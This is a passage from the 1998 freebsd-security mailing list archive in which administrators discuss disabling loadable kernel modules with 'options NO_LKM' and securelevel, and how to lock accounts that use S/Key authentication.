on FreeBSD) In-Reply-To: <19980521111653.A9283@homer.louisville.edu> from Keith Stevenson at "May 21, 98 11:16:53 am" To: k.stevenson@louisville.edu (Keith Stevenson) Date: Thu, 21 May 1998 11:29:37 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Keith Stevenson writes: > Ok, I'll buy off on the idea that LKMs can be bad from a security standpoint. > How does one go about removing that functionality from the system? Add: options NO_LKM to your kernel config file. > > Thanks, > --Keith Stevenson-- > > -- > Keith Stevenson > System Programmer - Data Center Services - University of Louisville > k.stevenson@louisville.edu > PGP key fingerprint = 4B 29 A8 95 A8 82 EA A2 29 CE 68 DE FC EE B6 A0 > > On Thu, May 21, 1998 at 10:31:08AM -0400, Greg A. Woods wrote: > > > > A "published" LKM that can do the most nasty things was in the Phrack > > newsletter issue #51. > > > > Anyone who's read that article and has even the tiniest amount of > > imagination would *NEVER* run LKMs on a production machine. Sure > > they're a great tool for doing OS developement and experimention at the > > lowest levels, but they're more dangerous in a production environment > > than not even having a root password in the first place (at least with > > the latter you *know* your security is blown). > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 11:40:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA00830 for freebsd-security-outgoing; Thu, 21 May 1998 11:40:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (dima@burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA00675 for ; Thu, 21 May 1998 11:39:56 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id LAA08124; Thu, 21 May 1998 11:39:37 -0700 (PDT) Message-Id: <199805211839.LAA08124@burka.rdy.com> Subject: Re: Virus on FreeBSD In-Reply-To: <19980521181555.59333@deepo.prosa.dk> from Philippe Regnauld at "May 21, 98 06:15:55 pm" To: regnauld@deepo.prosa.dk (Philippe Regnauld) Date: Thu, 21 May 1998 11:39:37 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Philippe Regnauld writes: > Greg A. Woods writes: > > > Anyone who's read that article and has even the tiniest amount of > > imagination would *NEVER* run LKMs on a production machine. Sure > > BTW, is there a mechanism to disable loading of LKMs ? > (of course, removing the modload command is one way) -- I was > thinking about something that looked at the securelevel > and refused to load/unload a module depending on it. You can't load LKMs if your secure level > 0. Just to make sure you can define NO_LKM in your kernel config file :-) > > -- > -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- > «Pluto placed his bad dog at the entrance of Hades to keep the dead > IN and the living OUT! The archetypical corporate firewall?» > - S. Kelly Bootle > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 12:02:56 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA04764 for freebsd-security-outgoing; Thu, 21 May 1998 12:02:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA04463 for ; Thu, 21 May 1998 12:01:40 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com) Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id PAA01303; Thu, 21 May 1998 15:01:21 -0400 (EDT) Received: from brain.zeus.leitch.com (brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id PAA03747; Thu, 21 May 1998 15:01:23 -0400 (EDT) Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id PAA23176; Thu, 21 May 1998 15:01:23 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com) Date: Thu, 21 May 1998 15:01:23 -0400 (EDT) Message-Id: <199805211901.PAA23176@brain.zeus.leitch.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit From: woods@zeus.leitch.com (Greg A. Woods) To: Philippe Regnauld Cc: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-Reply-To: Philippe Regnauld's message of "Thu, May 21, 1998 18:15:55 +0200" regarding "Re: Virus on FreeBSD" id <19980521181555.59333@deepo.prosa.dk> References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct> <199805211431.KAA17444@brain.zeus.leitch.com> <19980521181555.59333@deepo.prosa.dk> X-Mailer: VM 6.45 under Emacs 20.2.1 Reply-To: freebsd-security@FreeBSD.ORG Organization: Planix, Inc.; Toronto, Ontario; Canada Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk [ On Thu, May 21, 1998 at 18:15:55 (+0200), Philippe Regnauld wrote: ] > Subject: Re: Virus on FreeBSD > > Greg A. Woods writes: > > > Anyone who's read that article and has even the tiniest amount of > > imagination would *NEVER* run LKMs on a production machine. Sure > > BTW, is there a mechanism to disable loading of LKMs ? > (of course, removing the modload command is one way) -- I was > thinking about something that looked at the securelevel > and refused to load/unload a module depending on it. Not difficult at all, thankfully. Just define NO_LKM in your kernel configuration (from the /sys/i386/conf/LINT kernel config example): # If you want to disable loadable kernel modules (LKM), you # might want to use this option. options NO_LKM I've not done a code walkthrough to ensure this is 100%, but it's a good start and at least prevents modload from being useful. -- Greg A. Woods +1 416 443-1734 VE3TCP Planix, Inc. ; Secrets of the Weird To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 12:21:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA07498 for freebsd-security-outgoing; Thu, 21 May 1998 12:21:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA07454 for ; Thu, 21 May 1998 12:20:34 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com) Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id PAA01368; Thu, 21 May 1998 15:13:57 -0400 (EDT) Received: from brain.zeus.leitch.com (brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id PAA03785; Thu, 21 May 1998 15:13:59 -0400 (EDT) Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id PAA23207; Thu, 21 May 1998 15:13:58 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com) Date: Thu, 21 May 1998 15:13:58 -0400 (EDT) Message-Id: <199805211913.PAA23207@brain.zeus.leitch.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit From: woods@zeus.leitch.com (Greg A. Woods) To: Emmanuel Gravel Cc: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-Reply-To: Emmanuel Gravel's message of "Thu, May 21, 1998 09:38:00 -0700" regarding "Re: Virus on FreeBSD" id <3563F5F8.2CD24754@elr346.ateng.az.honeywell.com> References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct> <199805211431.KAA17444@brain.zeus.leitch.com> <3563F5F8.2CD24754@elr346.ateng.az.honeywell.com> X-Mailer: VM 6.45 under Emacs 20.2.1 Reply-To: freebsd-security@FreeBSD.ORG Organization: Planix, Inc.; Toronto, Ontario; Canada Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk [ On Thu, May 21, 1998 at 09:38:00 (-0700), Emmanuel Gravel wrote: ] > Subject: Re: Virus on FreeBSD > > > A "published" LKM that can do the most nasty things was in the Phrack > > newsletter issue #51. > > > Thanks for the info. I'm trying to get the info from Phrack #51 on > 2600.com but nothing seems to point to LKM's yet. Do you have any info > on which article it could be in? If it's in that one at all? Ah! You want phrack.com instead! The article I refer to is "Bypassing Integrity Checking Systems" and was written by halflife , and can be found in their archives section. -- Greg A. Woods +1 416 443-1734 VE3TCP Planix, Inc. ; Secrets of the Weird To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 12:24:51 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA08287 for freebsd-security-outgoing; Thu, 21 May 1998 12:24:51 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell.firehouse.net (qmailr@shell.firehouse.net [209.42.203.45]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id MAA08235 for ; Thu, 21 May 1998 12:24:25 -0700 (PDT) (envelope-from brian@shell.firehouse.net) Received: (qmail 2338 invoked by uid 113); 21 May 1998 19:24:11 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 21 May 1998 19:24:11 -0000 Date: Thu, 21 May 1998 15:24:10 -0400 (EDT) From: Brian Mitchell To: Philippe Regnauld cc: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-Reply-To: <19980521181555.59333@deepo.prosa.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Thu, 21 May 1998, Philippe Regnauld wrote: > Greg A. Woods writes: > > > Anyone who's read that article and has even the tiniest amount of > > imagination would *NEVER* run LKMs on a production machine. Sure > > BTW, is there a mechanism to disable loading of LKMs ? > (of course, removing the modload command is one way) -- I was > thinking about something that looked at the securelevel > and refused to load/unload a module depending on it. lkm doesnt work in securelevel 1+ i believe. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 13:11:22 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA19123 for freebsd-security-outgoing; Thu, 21 May 1998 13:11:22 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA19085 for ; Thu, 21 May 1998 13:10:52 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.0.Beta7/frmug-2.3/nospam) with UUCP id WAA27025 for freebsd-security@FreeBSD.ORG; Thu, 21 May 1998 22:10:43 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: (from roberto@localhost) by keltia.freenix.fr (8.9.0.Beta4/keltia-2.14/nospam) id UAA16309 for freebsd-security@FreeBSD.ORG; Thu, 21 May 1998 20:41:02 +0200 (CEST) (envelope-from roberto) Message-ID: <19980521204101.A16263@keltia.freenix.fr> Date: Thu, 21 May 1998 20:41:01 +0200 From: Ollivier Robert To: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct> <199805211431.KAA17444@brain.zeus.leitch.com> <19980521181555.59333@deepo.prosa.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.92.3i In-Reply-To: <19980521181555.59333@deepo.prosa.dk>; from Philippe Regnauld on Thu, May 21, 1998 at 06:15:55PM +0200 X-Operating-System: FreeBSD 3.0-CURRENT ctm#4308 AMD-K6 MMX @ 225 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk According to Philippe Regnauld: > BTW, is there a mechanism to disable loading of LKMs ? Try compiling your kernel with "options NO_LKM". -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #60: Fri May 15 21:04:22 CEST 1998 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 13:20:51 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA20511 for freebsd-security-outgoing; Thu, 21 May 1998 13:20:51 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA20481 for ; Thu, 21 May 1998 13:20:39 -0700 (PDT) (envelope-from cschuber@passer.osg.gov.bc.ca) Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id NAA08312; Thu, 21 May 1998 13:20:24 -0700 (PDT) Message-Id: <199805212020.NAA08312@passer.osg.gov.bc.ca> Received: from localhost(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost, id smtpdaajsoa; Thu May 21 13:20:15 1998 X-Mailer: exmh version 2.0gamma 1/27/96 Reply-to: Cy Schubert - ITSD Open Systems Group X-Sender: cschuber To: Keith Stevenson cc: freebsd-security@FreeBSD.ORG Subject: Re: LKMs (Was: Virus on FreeBSD) In-reply-to: Your message of "Thu, 21 May 1998 11:16:53 EDT." <19980521111653.A9283@homer.louisville.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 21 May 1998 13:19:54 -0700 From: Cy Schubert - ITSD Open Systems Group Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > Ok, I'll buy off on the idea that LKMs can be bad from a security standpoint. > How does one go about removing that functionality from the system? options NO_LKM then rebuild your kernel [I posted a similar comment to this list last night, however I've seen no trace of it -- hopefully this is not a dup for any of you.] Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: cschuber@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Government of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 17:03:19 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA03960 for freebsd-security-outgoing; Thu, 21 May 1998 17:03:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from wumpus.its.uow.edu.au (wumpus.its.uow.edu.au [130.130.68.12]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA03885 for ; Thu, 21 May 1998 17:02:51 -0700 (PDT) (envelope-from ncb05@uow.edu.au) Received: from banshee.cs.uow.edu.au (ncb05@banshee.cs.uow.edu.au [130.130.188.1]) by wumpus.its.uow.edu.au (8.9.0.Beta5/8.9.0.Beta5) with SMTP id KAA25995 for ; Fri, 22 May 1998 10:02:46 +1000 (EST) Date: Fri, 22 May 1998 10:02:46 +1000 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@banshee.cs.uow.edu.au To: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-Reply-To: <199805211431.KAA17444@brain.zeus.leitch.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Thu, 21 May 1998, Greg A. Woods wrote: > [ On Thu, May 21, 1998 at 11:19:29 (+0930), Mark Newton wrote: ] > > Subject: Re: Virus on FreeBSD > > > > LKMs open vast new vistas of potential for viruses, btw. I attended a > > series of seminars given my Kirk some number of years ago, where he > > said the decision to avoid expending development time on LKMs for 4.4BSD > > was partly motivated by the security concerns raised by the ability to > > move executable code from user-space (i.e.: the filesystem) into the > > kernel. Mitnick's SunOS "tap" streams module is but one example :-) > > A "published" LKM that can do the most nasty things was in the Phrack > newsletter issue #51. > > Anyone who's read that article and has even the tiniest amount of > imagination would *NEVER* run LKMs on a production machine. Sure > they're a great tool for doing OS developement and experimention at the > lowest levels, but they're more dangerous in a production environment > than not even having a root password in the first place (at least with > the latter you *know* your security is blown). > > (And that's just one reason never to run SunOS-5 in production! ;-) > > I'd love to have a "virus" scanner that could detect the signature of a > LKM module or the LKM loader in a kernel. Of course by "signature" here > I mean something that would recognize the style of code necessary to > perform this operation, not the specific sequence of bits in any given > implementation. You may have a point here. Is there any way you could "sign" a module to ensure it's authenticity? And on top of that build in an automatic authentication system within the kernel that rejects lkm's that are not signed? Perhaps this could be included so as to be performed at one of the securelevels? > > -- > Greg A. Woods > > +1 416 443-1734 VE3TCP > Planix, Inc. ; Secrets of the Weird > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > Nick -- Email: ncb05@uow.edu.au - DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A http://rabble.uow.edu.au/~nick - public key available on request. Nicholas Brawn - Computer Science Undergraduate, University of Wollongong. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 17:06:14 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA04746 for freebsd-security-outgoing; Thu, 21 May 1998 17:06:14 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA04633 for ; Thu, 21 May 1998 17:05:49 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.8.8/8.8.8) id UAA00936; Thu, 21 May 1998 20:05:20 -0400 (EDT) (envelope-from wollman) Date: Thu, 21 May 1998 20:05:20 -0400 (EDT) From: Garrett Wollman Message-Id: <199805220005.UAA00936@khavrinen.lcs.mit.edu> To: Philippe Regnauld Cc: freebsd-security@FreeBSD.ORG Subject: SKey and locked account In-Reply-To: <19980521183148.07894@deepo.prosa.dk> References: <19980521183148.07894@deepo.prosa.dk> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk < said: > 1) First thing I noticed is that it's possible for someone to log > into the system, even if the account is disabled ('*' in the > passwd field), when S/Key is enabled for that user. Having an invalid password in the password file doesn't mean that the account is disabled; it just means that that user can't use a plain-text password to log in. Several of us have invalid passwords on freefall since we always use an alternative authentication mechanism like S/Key. It might not be a bad idea to use the login class mechanism to define a specific class meaning ``disabled'' -- as distinguished from the ``account expired'' we can already represent in master.passwd. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 17:43:21 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA13614 for freebsd-security-outgoing; Thu, 21 May 1998 17:43:21 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from antipodes.cdrom.com (castles145.castles.com [208.214.165.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA13432 for ; Thu, 21 May 1998 17:42:28 -0700 (PDT) (envelope-from mike@antipodes.cdrom.com) Received: from antipodes.cdrom.com (localhost [127.0.0.1]) by antipodes.cdrom.com (8.8.8/8.8.5) with ESMTP id QAA05467; Thu, 21 May 1998 16:38:30 -0700 (PDT) Message-Id: <199805212338.QAA05467@antipodes.cdrom.com> X-Mailer: exmh version 2.0zeta 7/24/97 To: Philippe Regnauld cc: freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-reply-to: Your message of "Thu, 21 May 1998 18:31:48 +0200." <19980521183148.07894@deepo.prosa.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Date: Thu, 21 May 1998 16:38:30 -0700 From: Mike Smith Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by hub.freebsd.org id RAA13455 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > I'm currently experimenting with 2.2.6, FWTK and skey. > > 1) First thing I noticed is that it's possible for someone to log > into the system, even if the account is disabled ('*' in the > passwd field), when S/Key is enabled for that user. > > Surprise to me. "*" does not disable an account - it is an invalid crypted string which will fail to match any crypted plaintext password, as used by login, the r* commands and ftp (when FTP is not using s/key). If you wish to disable a user's account, you should set their shell to something nonexistent. (Note that ssh may still be a way past this.) -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 19:45:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA07955 for freebsd-security-outgoing; Thu, 21 May 1998 19:45:40 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from wumpus.its.uow.edu.au (wumpus.its.uow.edu.au [130.130.68.12]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA07938 for ; Thu, 21 May 1998 19:45:29 -0700 (PDT) (envelope-from ncb05@uow.edu.au) Received: from wumpus.its.uow.edu.au (wumpus.its.uow.edu.au [130.130.68.12]) by wumpus.its.uow.edu.au (8.9.0.Beta5/8.9.0.Beta5) with SMTP id MAA21043; Fri, 22 May 1998 12:45:18 +1000 (EST) Date: Fri, 22 May 1998 12:45:18 +1000 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@wumpus.its.uow.edu.au To: Emmanuel Gravel cc: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-Reply-To: <3563F5F8.2CD24754@elr346.ateng.az.honeywell.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Thu, 21 May 1998, Emmanuel Gravel wrote: > > A "published" LKM that can do the most nasty things was in the Phrack > > newsletter issue #51. > > > Thanks for the info. I'm trying to get the info from Phrack #51 on > 2600.com but nothing seems to point to LKM's yet. Do you have any info > on which article it could be in? If it's in that one at all? Try Phrack's official website at www.phrack.com. You will need to untar/gz the phrack51.tar.gz and view P51-01 to see which particular file the article is in. And btw, 2600 isn't affiliated with Phrack. > > cu l8r! > > Emmanuel Gravel > egravel@elr346.ateng.az.honeywell.com > Nick -- Email: ncb05@uow.edu.au - DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A http://rabble.uow.edu.au/~nick - public key available on request. Nicholas Brawn - Computer Science Undergraduate, University of Wollongong. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 20:23:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA13532 for freebsd-security-outgoing; Thu, 21 May 1998 20:23:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from parsons.rh.rit.edu (d117-h041.rh.rit.edu [129.21.117.169]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id UAA13527 for ; Thu, 21 May 1998 20:22:55 -0700 (PDT) (envelope-from mfisher@harborcom.net) Received: from mfisher by parsons.rh.rit.edu with smtp (Exim 1.82 #1) id 0yciPw-000143-00; Thu, 21 May 1998 23:22:48 -0400 Date: Thu, 21 May 1998 23:22:48 -0400 (EDT) From: Mike Fisher X-Sender: mfisher@d117-h041.rh.rit.edu Reply-To: Mike Fisher To: freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-Reply-To: <199805212338.QAA05467@antipodes.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Thu, 21 May 1998, Mike Smith wrote: > If you wish to disable a user's account, you should set their shell to > something nonexistent. (Note that ssh may still be a way past this.) As is the login.conf(5) database, from what I can tell. If the disabled user drops in a .login_conf that sets the shell, it will work although they will need to modify their SHELL environmental variable if they're going to be doing much fun stuff. However, I just did some playing around with this on a 2.2.6-STABLE system and didn't seem to have any luck subverting the configured shell. (Read: assuming I configure .login_conf correctly, it is not being used correctly.) Setting the shell to /sbin/nologin does seem to do the trick; it doesn't let S/Key through and it doesn't seem to allow anything else through. With SSH, I was unable to do a login via RSA keys or password authentication with the shell set to /sbin/nologin. I'd assume that the .shosts authentication would also be effectively broken. Of course, this is an inelegant fix for people who have set up a nice shell substitute that allows choices like password changes or whatnot, but I would imagine that in a situation where the account was locked, a password change is a minimal priority for people. -- Mike "I swear - by my life and by my love of it - that I will never live for the sake of another man, nor ask another man to live for mine." --Ayn Rand, _Atlas Shrugged_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 21:00:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA19434 for freebsd-security-outgoing; Thu, 21 May 1998 21:00:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from antipodes.cdrom.com (castles145.castles.com [208.214.165.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA19423 for ; Thu, 21 May 1998 21:00:15 -0700 (PDT) (envelope-from mike@antipodes.cdrom.com) Received: from antipodes.cdrom.com (localhost [127.0.0.1]) by antipodes.cdrom.com (8.8.8/8.8.5) with ESMTP id TAA06636; Thu, 21 May 1998 19:56:16 -0700 (PDT) Message-Id: <199805220256.TAA06636@antipodes.cdrom.com> X-Mailer: exmh version 2.0zeta 7/24/97 To: Mike Fisher cc: freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-reply-to: Your message of "Thu, 21 May 1998 23:22:48 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 21 May 1998 19:56:16 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > On Thu, 21 May 1998, Mike Smith wrote: > > > If you wish to disable a user's account, you should set their shell to > > something nonexistent. (Note that ssh may still be a way past this.) > > As is the login.conf(5) database, from what I can tell. If the disabled > user drops in a .login_conf that sets the shell, it will work although > they will need to modify their SHELL environmental variable if they're > going to be doing much fun stuff. > > However, I just did some playing around with this on a 2.2.6-STABLE system > and didn't seem to have any luck subverting the configured shell. (Read: > assuming I configure .login_conf correctly, it is not being used > correctly.) from login.conf(5) In FreeBSD, users may individually create a file called .login_conf in their home directory using the same format, consisting of a single entry with a record id of "me". If present, this file is used by login(1) to set user-defined environment settings which override those specified in the system login capabilities database. Only a subset of login capabili- ties may be overridden, typically those which do not involve authentica- tion, resource limits and accounting. In addition, the 'shell' capability seems to be unimplemented. 8( > With SSH, I was unable to do a login via RSA keys or password > authentication with the shell set to /sbin/nologin. I'd assume that the > ..shosts authentication would also be effectively broken. That's bad, and effectively a bug in ssh. -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 01:14:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA03720 for freebsd-security-outgoing; Fri, 22 May 1998 01:14:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA03510 for ; Fri, 22 May 1998 01:13:47 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id MAA17535; Fri, 22 May 1998 12:13:54 +0200 Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id KAA22054; Fri, 22 May 1998 10:38:04 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id KAA17390; Fri, 22 May 1998 10:12:15 +0200 (CEST) Message-ID: <19980522101215.41390@deepo.prosa.dk> Date: Fri, 22 May 1998 10:12:15 +0200 From: Philippe Regnauld To: Mike Smith Cc: freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account References: <19980521183148.07894@deepo.prosa.dk> <199805212338.QAA05467@antipodes.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: 